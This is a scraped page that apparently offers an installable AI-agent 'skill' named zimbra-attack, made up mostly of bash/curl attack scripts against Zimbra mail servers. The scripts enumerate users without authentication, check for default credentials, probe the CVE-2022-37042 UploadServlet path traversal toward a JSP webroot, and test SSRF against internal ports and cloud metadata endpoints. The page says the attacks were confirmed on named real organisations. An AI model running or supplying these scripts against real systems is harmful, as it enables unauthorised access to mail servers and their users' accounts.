원클릭으로
zimbra-attack
Zimbra SOAP user enum, CVE-2022-37042, SSRF when webmail.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Zimbra SOAP user enum, CVE-2022-37042, SSRF when webmail.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Escape Docker containers to host root via 5 techniques.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
| name | zimbra-attack |
| description | Zimbra SOAP user enum, CVE-2022-37042, SSRF when webmail. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei |
| metadata | {"tags":["recon","zimbra","SOAP","user-enum","CVE","email"],"category":"recon","related_skills":["exchange-owa-attack","port-service-discovery","subdomain-enumeration"]} |
Zimbra Collaboration Suite attack surface — SOAP API user enumeration without authentication, version fingerprinting, UploadServlet path traversal (CVE-2022-37042), /service/proxy internal SSRF, and Admin console access. Confirmed on IGN Argentina (Zimbra 8.8.11, admin user confirmed, UploadServlet active), CGE-RJ (Zimbra webmail, SOAP auth functional), and ITERJ (Zimbra webmail active).
webmail., mail., or zimbra. subdomains./zimbra/ path on mail server.subdomain-enumeration discovers webmail hosts.terminal tool with curl, python3.https://webmail.target.com).# Quick Zimbra detection
curl -skI "https://TARGET/" | grep -iE "zimbra|zmail"
# SOAP user enumeration
curl -sk -X POST "https://TARGET/service/soap/" \
-H "Content-Type: application/xml" \
-d '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context xmlns="urn:zimbra"/></soap:Header><soap:Body><AuthRequest xmlns="urn:zimbraAccount"><account by="name">admin@TARGET</account><password>test</password></AuthRequest></soap:Body></soap:Envelope>'
| Endpoint | What It Reveals | Risk |
|---|---|---|
/service/soap/ | SOAP API — user enum, auth testing | High |
/service/soap/AuthRequest | Differentiates valid user vs bad password | High |
/zimbraAdmin/ | Admin console (if exposed) | Critical |
/service/upload?fmt=ext | UploadServlet (CVE-2022-37042) | Critical |
/service/proxy?target= | Internal SSRF | Critical |
/service/extension/ | Extension listing | Medium |
/zimbra/downloads/index.html | Version disclosure | Medium |
/zimbra/skins/_base/logos/LoginBanner.png | Zimbra branding confirmation | Info |
TARGET="$1"
OUTDIR="/root/output/zimbra"
mkdir -p "$OUTDIR"
echo "[*] Zimbra detection on $TARGET"
# Check for Zimbra redirect/headers
INITIAL=$(curl -skI --max-time 10 "https://$TARGET/" 2>/dev/null)
if echo "$INITIAL" | grep -qi "zimbra\|zmail"; then
echo "[+] Zimbra confirmed in headers"
fi
# Check page title
TITLE=$(curl -sk --max-time 10 "https://$TARGET/" 2>/dev/null | grep -oP '<title>\K[^<]+')
if echo "$TITLE" | grep -qi "zimbra"; then
echo "[+] Zimbra confirmed — Title: $TITLE"
fi
# Version from download page
VER=$(curl -sk --max-time 10 "https://$TARGET/zimbra/downloads/index.html" 2>/dev/null | grep -oP 'Zimbra[^<]+' | head -1)
if [[ -n "$VER" ]]; then
echo "[+] Version: $VER"
fi
# Version from SOAP response
SOAP_RESP=$(curl -sk -X POST --max-time 10 "https://$TARGET/service/soap/" \
-H "Content-Type: application/xml" \
-d '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context xmlns="urn:zimbra"/></soap:Header><soap:Body><GetVersionInfoRequest xmlns="urn:zimbraAdmin"/></soap:Body></soap:Envelope>' 2>/dev/null)
ZIMBRA_VER=$(echo "$SOAP_RESP" | grep -oP '<VersionString>\K[^<]+')
ZIMBRA_RELEASE=$(echo "$SOAP_RESP" | grep -oP '<ReleaseString>\K[^<]+')
if [[ -n "$ZIMBRA_VER" ]]; then
echo "[+] Zimbra version from SOAP: $ZIMBRA_VER ($ZIMBRA_RELEASE)"
fi
TARGET="$1"
echo "[*] SOAP user enumeration on $TARGET"
# Test users
USERS=("admin" "administrator" "spam" "ham" "virus" "galsync" "wiki"
"user" "webmaster" "info" "contato" "suporte" "test")
for user in "${USERS[@]}"; do
# AuthRequest with wrong password — differentiates valid vs invalid user
RESP=$(curl -sk -X POST --max-time 5 "https://$TARGET/service/soap/" \
-H "Content-Type: application/xml" \
-d "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"/></soap:Header><soap:Body><AuthRequest xmlns=\"urn:zimbraAccount\"><account by=\"name\">$user@$TARGET_DOMAIN</account><password>wrongpass</password></AuthRequest></soap:Body></soap:Envelope>" 2>/dev/null)
if echo "$RESP" | grep -q "authentication failed"; then
echo " [VALID] $user — user EXISTS (wrong password)"
elif echo "$RESP" | grep -q "no such account"; then
echo " [INVALID] $user — does not exist"
elif echo "$RESP" | grep -q "<authToken>"; then
echo " [CRITICAL] $user — DEFAULT CREDENTIALS!"
fi
done
TARGET="$1"
echo "[*] CVE-2022-37042 check (UploadServlet path traversal)"
# This CVE allows unauthenticated file write via path traversal in UploadServlet
# Affects: Zimbra < 9.0.0 P27, < 8.8.15 P34
UPLOAD_RESP=$(curl -sk -X POST --max-time 10 "https://$TARGET/service/upload?fmt=extended" \
-H "Content-Type: application/octet-stream" \
-d "test" 2>/dev/null)
if echo "$UPLOAD_RESP" | grep -qi "upload\|success\|clientToken"; then
echo " [+] UploadServlet ACTIVE — CVE-2022-37042 potentially exploitable"
echo " Response: $(echo "$UPLOAD_RESP" | head -1)"
# Test path traversal (doesn't write — just tests if the endpoint processes it)
TRAVERSAL_RESP=$(curl -sk -X POST --max-time 10 "https://$TARGET/service/upload?fmt=extended&lbfums=" \
-H "Content-Type: application/octet-stream" \
-d "../../../../../../opt/zimbra/jetty/webapps/zimbra/public/test.jsp" 2>/dev/null)
if echo "$TRAVERSAL_RESP" | grep -qi "success"; then
echo " [CRITICAL] Path traversal appears functional"
fi
else
echo " [-] UploadServlet not accessible (patched or blocked)"
fi
TARGET="$1"
echo "[*] Internal SSRF via /service/proxy"
# Zimbra proxy endpoint allows internal HTTP requests
# Requires LOW-privilege auth, but worth probing unauthenticated
PROXY_TARGETS=(
"http://localhost:8080/"
"http://127.0.0.1:7071/" # Zimbra Admin port
"http://127.0.0.1:22/"
"http://169.254.169.254/latest/meta-data/" # AWS IMDS
"http://metadata.google.internal/"
)
for pt in "${PROXY_TARGETS[@]}"; do
code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 \
"https://$TARGET/service/proxy?target=${pt}" 2>/dev/null)
if [[ "$code" == "200" || "$code" == "500" ]]; then
echo " [SSRF] $pt → HTTP $code (internal service may be reachable)"
fi
done
TARGET="$1"
echo "[*] Zimbra Admin console check"
ADMIN_CODE=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 10 "https://$TARGET/zimbraAdmin/" 2>/dev/null)
if [[ "$ADMIN_CODE" == "200" ]]; then
echo " [+] Zimbra Admin console EXPOSED"
elif [[ "$ADMIN_CODE" == "302" ]]; then
LOCATION=$(curl -skI --max-time 5 "https://$TARGET/zimbraAdmin/" 2>/dev/null | grep -i "location:" | sed 's/.*: //')
echo " [REDIR] Admin console redirects to: $LOCATION"
else
echo " [-] Admin console: HTTP $ADMIN_CODE"
fi
# Check port 7071 (Zimbra Admin port, sometimes exposed without reverse proxy)
ADMIN_PORT=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 "https://$TARGET:7071/zimbraAdmin/" 2>/dev/null)
[[ "$ADMIN_PORT" == "200" ]] && echo " [CRITICAL] Admin console on port 7071 EXPOSED"
admin confirmed via SOAP AuthRequest/zimbraAdmin/ returns HTTP 500 (partial exposure)/service/soap/ and /service/soap/LoginRequest active| Version | CVE | Impact |
|---|---|---|
| < 8.8.15 P34 | CVE-2022-37042 | Auth bypass via UploadServlet path traversal (RCE) |
| < 9.0.0 P27 | CVE-2022-37042 | Auth bypass via UploadServlet path traversal (RCE) |
| < 8.8.15 P41 | CVE-2023-37580 | Reflected XSS in /public/login.jsp |
| < 8.8.15 P33 | CVE-2022-27925 | Admin console RCE via mboximport (authenticated) |
| 8.8.15 | CVE-2022-30333 | Arbitrary file write via Amavis (RCE) |